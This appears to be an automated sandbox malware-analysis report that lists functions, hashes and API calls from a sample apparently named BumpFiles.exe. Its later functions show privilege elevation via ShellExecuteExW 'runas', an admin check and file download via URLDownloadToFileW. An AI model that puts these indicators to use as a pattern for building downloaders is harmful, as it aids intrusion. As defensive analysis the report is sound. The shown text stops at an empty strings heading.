Source File: 00000003.00000002.1409287993.00007FFB4B1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb4b1a0000_Update.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 099e551044be143562ca3a008c6a1221e6e640b77f9ed0406295b488b817dd70
Instruction ID: 08eddf1bd5c555a9793ae466b489be978e395a6b1db63c143c9362a98f3f4603
Opcode Fuzzy Hash: 099e551044be143562ca3a008c6a1221e6e640b77f9ed0406295b488b817dd70
Instruction Fuzzy Hash: CEA01233B44019444B109484F8000FDB310DBC9135B100033E31DC1000551124280580

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FFB4B1C14B5 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1409287993.00007FFB4B1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb4b1a0000_Update.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4013b699dc2d9824e46453d22b1207813824fcf5145f9635b0f6d0b0d8be1a92
Instruction ID: 672f9b1ce76092232939f8a5d7958023367a1124acbb70cb05440160a8f047e2
Opcode Fuzzy Hash: 4013b699dc2d9824e46453d22b1207813824fcf5145f9635b0f6d0b0d8be1a92
Instruction Fuzzy Hash: ECF0F6A040D7900FE3665B39C5511B13FE0EF4622070582EAD599CB5E3D6599CD683A2

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4B1A21C9 Relevance: 11.4, Strings: 9, Instructions: 163COMMON

Download Yara Rule

Strings

HAK, xrefs: 00007FFB4B1A2305
HAK, xrefs: 00007FFB4B1A2292
HAK, xrefs: 00007FFB4B1A21EF
HAK, xrefs: 00007FFB4B1A2341
HAK, xrefs: 00007FFB4B1A2242
HAK, xrefs: 00007FFB4B1A2358
HAK, xrefs: 00007FFB4B1A227B
HAK, xrefs: 00007FFB4B1A22E3
HAK, xrefs: 00007FFB4B1A2206

Memory Dump Source

Source File: 00000003.00000002.1409287993.00007FFB4B1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb4b1a0000_Update.jbxd

Similarity

API ID:
String ID: HAK$HAK$HAK$HAK$HAK$HAK$HAK$HAK$HAK
API String ID: 0-885384745
Opcode ID: e7cc2549638d6dc913c205b366e4ee935104281f806b4027ecda7a0e9c61b4c9
Instruction ID: 9ec24ae416678775add30964c595abe937e795310a0049d1abdd139d7afd02ff
Opcode Fuzzy Hash: e7cc2549638d6dc913c205b366e4ee935104281f806b4027ecda7a0e9c61b4c9
Instruction Fuzzy Hash: 9A4137D3B2C94B0BE7A9AA3C985727917C2EFAC790B4540BAD18DC32A2DC1C6C4347C0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4B1B7910 Relevance: 10.3, Strings: 8, Instructions: 343COMMON

Download Yara Rule

Strings

p$.K, xrefs: 00007FFB4B1B7A09
P$.K, xrefs: 00007FFB4B1B79E9
$.K, xrefs: 00007FFB4B1B79B9
%.K, xrefs: 00007FFB4B1B7A69
0$.K, xrefs: 00007FFB4B1B79C9
`$.K, xrefs: 00007FFB4B1B79F9
#.K, xrefs: 00007FFB4B1B7979
@$.K, xrefs: 00007FFB4B1B79D9

Memory Dump Source

Source File: 00000003.00000002.1409287993.00007FFB4B1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb4b1a0000_Update.jbxd

Similarity

API ID:
String ID: $.K$0$.K$@$.K$P$.K$`$.K$p$.K$#.K$%.K
API String ID: 0-1734388764
Opcode ID: 94d8ba71037c888d7d6545ab2ecbf92fe9af3277b695b26af5c6193ddae5e3bf
Instruction ID: f37ab7a33e49920b5d4c78be8a38f74511484856c8447a0fcf0df24027d48c3e
Opcode Fuzzy Hash: 94d8ba71037c888d7d6545ab2ecbf92fe9af3277b695b26af5c6193ddae5e3bf
Instruction Fuzzy Hash: 189116D790E6824BE31ABA7DF9560E82F84DFC2A7C74882B7D1CD4D0D76824590E4AF4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4B1C10B8 Relevance: 10.3, Strings: 8, Instructions: 268COMMON

Download Yara Rule

Strings

hk0K, xrefs: 00007FFB4B1C2483
HAK, xrefs: 00007FFB4B1C2BF7
hk0K, xrefs: 00007FFB4B1C2BE0
HAK, xrefs: 00007FFB4B1C2BAE
HAK, xrefs: 00007FFB4B1C2B75
HAK, xrefs: 00007FFB4B1C249A
hk0K, xrefs: 00007FFB4B1C2B5E
hk0K, xrefs: 00007FFB4B1C2B97

Memory Dump Source

Source File: 00000003.00000002.1409287993.00007FFB4B1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb4b1a0000_Update.jbxd

Similarity

API ID:
String ID: HAK$HAK$HAK$HAK$hk0K$hk0K$hk0K$hk0K
API String ID: 0-828908927
Opcode ID: a857194d679abb6cf6cd715c3bc644b53d27efdc6582271af8219075e41e3c00
Instruction ID: 10e25dd4898b3c1b214afb8eeb44d367831465d112bca0e5c0097e6d12d9dc9e
Opcode Fuzzy Hash: a857194d679abb6cf6cd715c3bc644b53d27efdc6582271af8219075e41e3c00
Instruction Fuzzy Hash: 7C713AB6A0C98E4FEB59EA3CC8662B93BE1EF95310F0441FAD149C71E7DD185C028791

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4B1A04F2 Relevance: 7.8, Strings: 6, Instructions: 302COMMON

Download Yara Rule

Strings

L_^f, xrefs: 00007FFB4B1A0722
L_^N, xrefs: 00007FFB4B1A06C2
L_^v, xrefs: 00007FFB4B1A0762
?L_^, xrefs: 00007FFB4B1A0501
L_^t, xrefs: 00007FFB4B1A075A
L_^P, xrefs: 00007FFB4B1A06C9

Memory Dump Source

Source File: 00000003.00000002.1409287993.00007FFB4B1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb4b1a0000_Update.jbxd

Similarity

API ID:
String ID: ?L_^$L_^N$L_^P$L_^f$L_^t$L_^v
API String ID: 0-3730446074
Opcode ID: f290f2cf590c720745a08febe76016e7a43c32ea7cf9c8e9802fd49056b643a4
Instruction ID: aa12ccb4bf372512ad91cb77629d4c5f7c8f4fbe6333abbbc2f1a91f89da8182
Opcode Fuzzy Hash: f290f2cf590c720745a08febe76016e7a43c32ea7cf9c8e9802fd49056b643a4
Instruction Fuzzy Hash: A581A0C3A0E16245E20676FCF95B0E92B44CF83B79B1895B7D6CD480D36C29308B4AE6

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4B1A2A50 Relevance: 7.8, Strings: 6, Instructions: 255COMMON

Download Yara Rule

Strings

HAK, xrefs: 00007FFB4B1A2A6E
HAK, xrefs: 00007FFB4B1A2B2D
HAK, xrefs: 00007FFB4B1A2AEA
HAK, xrefs: 00007FFB4B1A2BAB
HAK, xrefs: 00007FFB4B1A2B89
wR_H, xrefs: 00007FFB4B1A2B93

Memory Dump Source

Source File: 00000003.00000002.1409287993.00007FFB4B1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb4b1a0000_Update.jbxd

Similarity

API ID:
String ID: HAK$HAK$HAK$HAK$HAK$wR_H
API String ID: 0-2739653816
Opcode ID: 52f97eae2d29b4b263f2e6b5753a4448edc63a52f8a406c5bf8f03d2b4bd5eb2
Instruction ID: 265bd1e72263c9b9e7e52acfd26ec061af9a1b48ab1c7d85ba4c318e5230c2da
Opcode Fuzzy Hash: 52f97eae2d29b4b263f2e6b5753a4448edc63a52f8a406c5bf8f03d2b4bd5eb2
Instruction Fuzzy Hash: 646158A2B2CD4A0FE76DAA3C984527967C1EF89764F04837AD58EC31E6DD286C0347D1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4B1B8FB5 Relevance: 6.4, Strings: 5, Instructions: 135COMMON

Download Yara Rule

Strings

hS.K, xrefs: 00007FFB4B1B9071
XS.K, xrefs: 00007FFB4B1B9061
xS.K, xrefs: 00007FFB4B1B9081
HS.K, xrefs: 00007FFB4B1B9051
(S.K, xrefs: 00007FFB4B1B9031

Memory Dump Source

Source File: 00000003.00000002.1409287993.00007FFB4B1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb4b1a0000_Update.jbxd

Similarity

API ID:
String ID: (S.K$HS.K$XS.K$hS.K$xS.K
API String ID: 0-1494722015
Opcode ID: 80dccde2299638c547053f099ffc1d38f3f5ccd0cd48b5e66872d7b837fdc477
Instruction ID: 3896e1144b922661d39578d5613d917ef205c1d1ca02d7cf6b9b43b0b48d0947
Opcode Fuzzy Hash: 80dccde2299638c547053f099ffc1d38f3f5ccd0cd48b5e66872d7b837fdc477
Instruction Fuzzy Hash: D0413CC391E6C60FE3159A7CAD851A56FC2EFA2A9870C82FBD1D80A0E7D85458078792

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4B1A71F9 Relevance: 5.3, Strings: 4, Instructions: 344COMMON

Download Yara Rule

Strings

b(K, xrefs: 00007FFB4B1A7471
`(K, xrefs: 00007FFB4B1A7421
`(K, xrefs: 00007FFB4B1A7411
b(K, xrefs: 00007FFB4B1A7481

Memory Dump Source

Source File: 00000003.00000002.1409287993.00007FFB4B1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb4b1a0000_Update.jbxd

Similarity

API ID:
String ID: `(K$`(K$b(K$b(K
API String ID: 0-2867019713
Opcode ID: 30bb6909ebb0882d36a6b69d2a1228449d4c076f1029b71acd1cd1d15b083cc3
Instruction ID: e2139c6314bf3ce4d22363ec08418677b31a781130a5d43221e98cf819f2c170
Opcode Fuzzy Hash: 30bb6909ebb0882d36a6b69d2a1228449d4c076f1029b71acd1cd1d15b083cc3
Instruction Fuzzy Hash: 9EA1159390E6954AE30A7A7CFD860E47F54EF4363870883F7D5888E0E7EC28554A86A5

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: BumpFiles.exePID: 7296, Parent PID: 7188COMMON

Execution Graph

Execution Coverage:	4.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.7%
Total number of Nodes:	1279
Total number of Limit Nodes:	19

Executed Functions

Function 00633718 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 100
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteExW.SHELL32(?), ref: 006337C2
WaitForSingleObject.KERNEL32(?,000000FF,00000000,00633830,?,00000000,00633855,?,?,?,?), ref: 006337D1
MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 006337F3
GetExitCodeProcess.KERNEL32(?,?), ref: 00633805
CloseHandle.KERNEL32(?,00000001,?,00000000,000000FF,000004FF,00000001,?,00000000,000000FF,000004FF,?,000000FF,00000000,00633830), ref: 00633815

Strings

runas, xrefs: 0063376B

Memory Dump Source

Source File: 00000004.00000002.2608268480.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2608144456.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608633719.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608665002.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608698172.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608788352.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608862949.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608945208.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd

Similarity

API ID: Wait$CloseCodeExecuteExitHandleMultipleObjectObjectsProcessShellSingle
String ID: runas
API String ID: 1089270204-4000483414
Opcode ID: fbfe01764bf3bd133da6426b1707191181eb6e5d9c76948ec3c121628ac9f268
Instruction ID: cfef6ee1f5db3d8dbd30449f85d256f355e06a594c341b1f80d548b0f9f1c305
Opcode Fuzzy Hash: fbfe01764bf3bd133da6426b1707191181eb6e5d9c76948ec3c121628ac9f268
Instruction Fuzzy Hash: 36319EB1A04254DFDB01EF69D882A8ABBF9FF48310F50857AF801DB395D678DA41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040D51C Relevance: 3.1, APIs: 2, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,0040D5DC,?,?), ref: 0040D54E
GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,0040D5DC,?,?), ref: 0040D557

Part of subcall function 0040D3E4: FindFirstFileW.KERNEL32(00000000,?,00000000,0040D442,?,00000001), ref: 0040D417
Part of subcall function 0040D3E4: FindClose.KERNEL32(00000000,00000000,?,00000000,0040D442,?,00000001), ref: 0040D427

Memory Dump Source

Source File: 00000004.00000002.2608268480.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2608144456.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608633719.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608665002.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608698172.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608788352.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608862949.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608945208.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd

Similarity

API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
String ID:
API String ID: 3216391948-0
Opcode ID: 6d985cf35389fe99b6aefce10a28e4a55a65cc63afe30c83d0da8f23af8a3727
Instruction ID: 8863e0a287c16cdc3c28c396c55d2e72c7f1b10b95ecf773108c4199bfcc3fe4
Opcode Fuzzy Hash: 6d985cf35389fe99b6aefce10a28e4a55a65cc63afe30c83d0da8f23af8a3727
Instruction Fuzzy Hash: 5A114870A002099BDB04EF95C892AAEB7B5EF48304F50447BF904B73D2DB389E058A59

Uniqueness

Uniqueness Score: -1.00%

Function 0040D3E4 Relevance: 3.0, APIs: 2, Instructions: 33
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,0040D442,?,00000001), ref: 0040D417
FindClose.KERNEL32(00000000,00000000,?,00000000,0040D442,?,00000001), ref: 0040D427

Memory Dump Source

Source File: 00000004.00000002.2608268480.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2608144456.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608633719.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608665002.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608698172.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608788352.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608862949.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608945208.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 1110422f23eefb4f4ddb778a27eb06d711fe7b6b4b1944915767f1634bda9307
Instruction ID: d95ccfb9285443909eeab24cd5826697557166218ec92875eff56e639bb6d067
Opcode Fuzzy Hash: 1110422f23eefb4f4ddb778a27eb06d711fe7b6b4b1944915767f1634bda9307
Instruction Fuzzy Hash: 06F08271904644AECB50FBB5CC9299EB7ACEF483187E045B7B404F22D2EA3CAF14995D

Uniqueness

Uniqueness Score: -1.00%

Function 0040D008 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 173
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040D22D,?,?), ref: 0040D041
RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040D22D,?,?), ref: 0040D08A
RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040D22D,?,?), ref: 0040D0AC
RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 0040D0CA
RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 0040D0E8
RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 0040D106
RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 0040D124
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,0040D210,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040D22D), ref: 0040D164
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,0040D210,?,80000001), ref: 0040D18F
RegCloseKey.ADVAPI32(?,0040D217,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,0040D210,?,80000001,Software\Embarcadero\Locales), ref: 0040D20A

Strings

Software\Embarcadero\Locales, xrefs: 0040D080, 0040D0A2
Software\Borland\Delphi\Locales, xrefs: 0040D11A
Software\Borland\Locales, xrefs: 0040D0FC
Software\CodeGear\Locales, xrefs: 0040D0C0, 0040D0DE

Memory Dump Source

Source File: 00000004.00000002.2608268480.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2608144456.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608633719.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608665002.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608698172.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608788352.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608862949.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608945208.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd

Similarity

API ID: Open$QueryValue$CloseFileModuleName
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
API String ID: 2701450724-3496071916
Opcode ID: 671aabb344a02d4a21f5d1e96b5259cc6b85b314e7807c62b9a1e8afea213112
Instruction ID: 96a9666c888c6573c04f77d76a58949e2d0052d2a9ed3862a85dc5018720b54c
Opcode Fuzzy Hash: 671aabb344a02d4a21f5d1e96b5259cc6b85b314e7807c62b9a1e8afea213112
Instruction Fuzzy Hash: C5510275E80608BFEB10EAD5CC46FAF73BCEB58704F5044BABA04F61C1D6789A448A5D

Uniqueness

Uniqueness Score: -1.00%

Function 00410844 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 258
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004108FC

Strings

lld, xrefs: 004108BE
Lld, xrefs: 00410859

Memory Dump Source

Source File: 00000004.00000002.2608268480.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2608144456.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608633719.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608665002.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608698172.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608788352.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608862949.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608945208.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd

Similarity

API ID: ExceptionRaise
String ID: Lld$lld
API String ID: 3997070919-3762902296
Opcode ID: 607d2351983e50f33505caff717241c6807bb6ddee907fbd5a450f9bc46cac13
Instruction ID: 3f85bfe050b3ea984b5aeb894ecb8602a3e2b9af0aebbdfc5bfded10294532e9
Opcode Fuzzy Hash: 607d2351983e50f33505caff717241c6807bb6ddee907fbd5a450f9bc46cac13
Instruction Fuzzy Hash: 14A17DB5A003099FDB14CFE8D890BEEB7B5BF59314F14412AE505AB381DBB8A9C4CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040CCD4 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32(00651C14,00000000,0040CDD8,?,?,?,00000000,?,0040D6A0,00000000,0040D6FF,?,?,00000000,00000000,00000000), ref: 0040CCF2
LeaveCriticalSection.KERNEL32(00651C14,00651C14,00000000,0040CDD8,?,?,?,00000000,?,0040D6A0,00000000,0040D6FF,?,?,00000000,00000000), ref: 0040CD16
LeaveCriticalSection.KERNEL32(00651C14,00651C14,00000000,0040CDD8,?,?,?,00000000,?,0040D6A0,00000000,0040D6FF,?,?,00000000,00000000), ref: 0040CD25
IsValidLocale.KERNEL32(00000000,00000002,00651C14,00651C14,00000000,0040CDD8,?,?,?,00000000,?,0040D6A0,00000000,0040D6FF), ref: 0040CD37
EnterCriticalSection.KERNEL32(00651C14,00000000,00000002,00651C14,00651C14,00000000,0040CDD8,?,?,?,00000000,?,0040D6A0,00000000,0040D6FF), ref: 0040CD94
LeaveCriticalSection.KERNEL32(00651C14,00651C14,00000000,00000002,00651C14,00651C14,00000000,0040CDD8,?,?,?,00000000,?,0040D6A0,00000000,0040D6FF), ref: 0040CDBD

Strings

en-GB,en,en-US,, xrefs: 0040CD02, 0040CDA9

Memory Dump Source

Source File: 00000004.00000002.2608268480.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2608144456.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608633719.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608665002.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608698172.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608788352.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608862949.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608945208.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$LocaleValid
String ID: en-GB,en,en-US,
API String ID: 975949045-3021119265
Opcode ID: dcfe28fe5da47c34272f0c7d91ae044fe9da86b6e61108bd54da0cc9d8f79f5b
Instruction ID: 257e64961a288cd264a0ffaab5fede5390936cc15f122fe2aa70ea45eab53adf
Opcode Fuzzy Hash: dcfe28fe5da47c34272f0c7d91ae044fe9da86b6e61108bd54da0cc9d8f79f5b
Instruction Fuzzy Hash: C021A1207C0700ABD710B7BA8C8276E359A9F46705F50853FB400BA2D3CA7D8C4597AE

Uniqueness

Uniqueness Score: -1.00%

Function 00409778 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 161
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 004097AF

Strings

0Q@, xrefs: 004097CC
8Q@, xrefs: 004097D6
t5B, xrefs: 00409AD2

Memory Dump Source

Source File: 00000004.00000002.2608268480.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2608144456.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608633719.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608665002.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608698172.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608788352.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608862949.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608945208.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd

Similarity

API ID: CurrentThread
String ID: 0Q@$8Q@$t5B
API String ID: 2882836952-4101180140
Opcode ID: bd1549fbf8f57001a698ec59130599b92d530f04859152d71de3bc48d7d6092a
Instruction ID: fa2ecaef7f14139ccfdb006b918d688549a946047fb110133aaf8be8ca82c4d5
Opcode Fuzzy Hash: bd1549fbf8f57001a698ec59130599b92d530f04859152d71de3bc48d7d6092a
Instruction Fuzzy Hash: 8D517B74A002058BDB24EF29D88475A7BE1BB49324F14857EE845AB3D3D778EC85CB19

Uniqueness

Uniqueness Score: -1.00%

Function 00633404 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 65
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsUserAnAdmin.SHELL32 ref: 00633424
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 006334A4

Part of subcall function 00424F1C: GetFileAttributesW.KERNEL32(00000000,?,?,?,?,?,0063344B,00000000,006334CB), ref: 00424F32

Part of subcall function 004258EC: CreateDirectoryW.KERNEL32(00000000,00000000,?,00633459,00000000,006334CB), ref: 004258F9

Part of subcall function 00633A38: Sleep.KERNEL32(0000012C,00000000,00633AEE), ref: 00633A6F
Part of subcall function 00633A38: URLDownloadToFileW.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 00633A8C
Part of subcall function 00633A38: Sleep.KERNEL32(0000012C,0000012C,00000000,00633AEE), ref: 00633AC6

Strings

